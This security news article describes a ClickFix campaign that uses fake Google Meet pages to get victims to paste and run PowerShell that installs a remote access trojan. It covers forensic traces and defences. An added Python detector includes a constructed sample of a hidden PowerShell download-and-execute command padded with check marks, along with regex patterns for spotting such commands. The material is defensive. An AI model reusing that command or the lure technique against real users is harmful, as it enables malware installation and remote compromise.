Cybercriminals Exploit Fake Google Meet Pages to Deploy Remote Access Trojans
A sophisticated cyberattack has emerged, targeting remote workers and organizations through counterfeit Google Meet landing pages. This campaign employs the ClickFix social engineering technique to bypass traditional browser security measures and deliver Remote Access Trojans (RATs) directly to victims’ systems.
Deceptive Tactics and Execution
The attack begins when a user visits a fraudulent site, such as gogl-meet[.]com, which closely mimics the legitimate Google Meet interface. Upon attempting to join a meeting, the user encounters a pop-up error message reporting a camera or microphone issue, titled "Can't join the meeting". Unlike standard phishing attempts that solicit credentials, this scheme offers a technical fix that requires user interaction. The prompt instructs the victim to perform a specific key sequence: press the Windows key + R, then CTRL + V, and finally Enter.
Unbeknownst to the user, clicking the Join now or Fix button on the page triggers a JavaScript function that copies a malicious PowerShell script to their clipboard. By following the manual keystroke instructions, the user unwittingly pastes and executes this script via the Windows Run dialog, effectively bypassing browser-based security filters such as Google Safe Browsing and SmartScreen.
Forensic Analysis and Indicators
Incident response activities involving gogl-meet[.]com have confirmed that this chain leads to a RAT infection. Forensic analysis of affected systems identified the infection's root cause through the Master File Table (MFT). Specifically, the MFT entry for the dropped payload revealed critical origin data in its alternate data stream (ADS), recording both the URL of the file downloaded during the ClickFix step and the referrer URL gogl-meet[.]com. This forensic artifact is crucial for defenders, as it definitively links the execution of the RAT back to the browser-based social engineering event rather than to a typical drive-by download or email attachment.
A distinct characteristic of this wave is the obfuscation used within the PowerShell payload itself. Threat actors have begun padding the malicious script with extensive comments containing trusted visual symbols, such as repeated green check marks. When a user pastes the content into the small Windows Run box, these symbols may be the only visible text, visually reassuring the victim that the command is verified or safe. This tactic also serves a technical purpose: it can push the actual malicious code (often an IEX download cradle) out of the immediate visible area of the dialog box, masking the script’s true intent.
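As an added example (not code from the original report), the following Python shows the two detection angles described above: parsing the Zone.Identifier alternate data stream that Windows browsers attach to downloads (the report names only the ADS, not the stream, so that naming is an assumption) to recover the host and referrer URLs, and scoring a powershell.exe command line for ClickFix traits such as a download cradle, a Run-dialog parent and comment padding with trust symbols. The sample stream and command line are constructed placeholders, not real indicators.

```python
import re
from typing import Dict

# Constructed sample of a Zone.Identifier ADS as a browser writes it next to a
# download (placeholder values, not real IoCs).
SAMPLE_ZONE_IDENTIFIER = (
    "[ZoneTransfer]\r\nZoneId=3\r\n"
    "ReferrerUrl=https://gogl-meet[.]com/join\r\n"
    "HostUrl=https://cdn.example.invalid/fix.ps1\r\n"
)

# Constructed sample of a ClickFix-style command line: an IEX download cradle
# followed by a long comment of check marks that fills the visible Run box.
SAMPLE_CLICKFIX_CMDLINE = (
    'powershell -w hidden -nop -c "iex (irm https://cdn.example.invalid/fix.ps1)"'
    + " # " + "\u2705 Verified Google Meet fix " * 6
)

def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Parse the INI-style [ZoneTransfer] stream into a dict of its fields."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        if "=" in line and not line.startswith("["):
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields

# Heuristics for a command line handed to powershell.exe.
CRADLE = re.compile(r"\b(iex|invoke-expression|irm|invoke-restmethod|"
                    r"invoke-webrequest|downloadstring)\b", re.I)
STEALTH = re.compile(r"-(w(indowstyle)?\s+hidden|nop|noprofile|"
                     r"ep\s+bypass|executionpolicy\s+bypass)", re.I)
COMMENTS = re.compile(r"<#.*?#>|#[^\r\n]*", re.S)  # block and line comments

def clickfix_indicators(cmdline: str, parent: str) -> Dict[str, bool]:
    """Return per-trait booleans for one process-creation record."""
    comment_chars = sum(len(c) for c in COMMENTS.findall(cmdline))
    symbols = sum(1 for ch in cmdline if ord(ch) >= 0x2600)  # dingbats/emoji
    return {
        "run_dialog_parent": parent.lower() == "explorer.exe",  # Win+R path
        "download_cradle": bool(CRADLE.search(cmdline)),
        "stealth_flags": bool(STEALTH.search(cmdline)),
        "comment_padding": comment_chars > len(cmdline) // 2,
        "trust_symbols": symbols >= 3,
    }

def is_suspicious(cmdline: str, parent: str) -> bool:
    """Alert when a cradle is present and at least three traits co-occur."""
    ind = clickfix_indicators(cmdline, parent)
    return ind["download_cradle"] and sum(ind.values()) >= 3
```

The ReferrerUrl recovered from the stream is what ties the dropped file back to the lure page, while the command-line score is the signal an EDR rule would raise on the Win+R execution itself.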
Evolution of ClickFix Campaigns
While ClickFix (also associated with clusters like ClearFake) gained significant traction throughout 2024, this latest iteration demonstrates a shift toward hyper-targeted branding. Early campaigns impersonated generic browser updates or Word errors, but the move to a Google Meet simulation suggests a pivot toward corporate environments, where video conferencing glitches are a common and trusted source of friction.
Defense Strategies
This attack vector is particularly dangerous because it circumvents traditional browser security features by relying on manual user interaction rather than automated file execution. Organizations must implement comprehensive security awareness training, emphasizing that legitimate services never require users to execute PowerShell commands from instructions found on a web page or in an email. Technical defenses should include endpoint detection and response solutions capable of monitoring PowerShell execution, implementing application whitelisting, and deploying web application firewalls to block access to known malicious domains.